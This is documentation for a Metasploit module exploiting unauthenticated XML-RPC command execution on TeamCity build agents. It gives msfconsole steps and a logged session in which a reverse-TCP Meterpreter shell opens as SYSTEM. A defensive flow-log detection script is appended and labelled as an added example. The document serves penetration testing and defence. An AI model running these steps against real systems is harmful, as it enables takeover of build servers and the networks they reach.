metasploit-gs/documentation/modules/exploit/multi/misc/teamcity_agent_xmlrpc_exec.md
2018-11-27 14:46:19 -06:00

Description

This module allows remote code execution on TeamCity Agents configured to use bidirectional communication via XML-RPC. In bidirectional mode, the TeamCity server pushes build commands to the Build Agents over TCP port 9090 without requiring authentication. Up until version 10, this was the default configuration. This module supports TeamCity agents from version 6.0 onwards.

This module makes use of both a Windows and a Linux command stager. For Linux, the echo command stager flavor was replaced with the printf command stager flavor due to portability issues associated with echo and its options.

Vulnerable Application

This module has been tested successfully with the following TeamCity Agent versions:

  • TeamCity 6.0
  • TeamCity 6.5
  • TeamCity 7.0
  • TeamCity 8.0
  • TeamCity 9.0
  • TeamCity 10.0
  • TeamCity 2017
  • TeamCity 2018

Verification Steps

  1. msfconsole
  2. use exploit/multi/misc/teamcity_agent_xmlrpc_exec
  3. set RHOSTS <rhost>
  4. set payload <payload>
  5. run

Options

RPORT

The port the TeamCity Agent is listening on (default: 9090).

CMD

If specified, the module runs the given command instead of executing the payload.

Scenarios

Windows Server 2012 R2 (x64) with TeamCity Agent 2018.1

msf5 > use exploit/multi/misc/teamcity_agent_xmlrpc_exec 
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set RHOSTS 172.16.198.149
RHOSTS => 172.16.198.149
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > set LHOST eth0
LHOST => eth0
msf5 exploit(multi/misc/teamcity_agent_xmlrpc_exec) > run

[*] Started reverse TCP handler on 172.16.198.150:4444 
[*] Found TeamCity Agent running build version 58245
[*] Constructing Windows payload
[*] Found compatible build config for TeamCity build 58245
[*] Successfully sent build configuration
[*] Sending stage (179779 bytes) to 172.16.198.149
[*] Meterpreter session 1 opened (172.16.198.150:4444 -> 172.16.198.149:49178) at 2018-10-03 17:21:12 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
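
Seen from the defender's side, the session above is a connection to an agent's unauthenticated TCP port 9090 from a host that is not the TeamCity server. The following detection sketch is an added example, not part of the module or its documentation; the CSV flow-log format, the server address 172.16.198.10, the function name, and the sample records are all assumptions constructed for illustration.

```python
import csv
import ipaddress
from io import StringIO

AGENT_PORT = 9090  # default RPORT per the module documentation

# Constructed sample flow records (time, src, dst, dst_port, action); not real logs.
# 172.16.198.10 is an assumed TeamCity server address.
SAMPLE_FLOWS = """\
2018-10-03T17:20:58,172.16.198.10,172.16.198.149,9090,allow
2018-10-03T17:21:10,172.16.198.150,172.16.198.149,9090,allow
2018-10-03T17:21:11,172.16.198.150,172.16.198.149,445,deny
2018-10-03T17:21:15,172.16.198.77,172.16.198.149,9090,deny
malformed line without enough fields
2018-10-03T17:22:00,172.16.198.150,172.16.198.20,9090,allow
"""


def unexpected_agent_connections(log_text, agents, servers, port=AGENT_PORT):
    """Return flows that reach an agent's XML-RPC port from a non-server source."""
    agent_nets = [ipaddress.ip_network(a) for a in agents]
    server_nets = [ipaddress.ip_network(s) for s in servers]
    findings = []
    for row in csv.reader(StringIO(log_text)):
        if len(row) != 5:
            continue  # skip malformed records instead of failing the whole run
        when, src, dst, dport, action = (field.strip() for field in row)
        try:
            src_ip, dst_ip = ipaddress.ip_address(src), ipaddress.ip_address(dst)
            dport = int(dport)
        except ValueError:
            continue  # unparseable address or port
        if dport != port or not any(dst_ip in n for n in agent_nets):
            continue  # not traffic to a known agent's XML-RPC port
        if any(src_ip in n for n in server_nets):
            continue  # expected: the server pushing build commands to its agent
        # An allowed flow means the port is exposed; a denied one shows the filter working.
        severity = "high" if action.lower() == "allow" else "info"
        findings.append({"time": when, "src": src, "dst": dst, "severity": severity})
    return findings


if __name__ == "__main__":
    for finding in unexpected_agent_connections(
            SAMPLE_FLOWS, agents=["172.16.198.149/32"], servers=["172.16.198.10/32"]):
        print(finding)
```

A "high" finding indicates that the agent port is reachable from hosts other than the server, which a host or network firewall rule restricting TCP 9090 to the server's address would close.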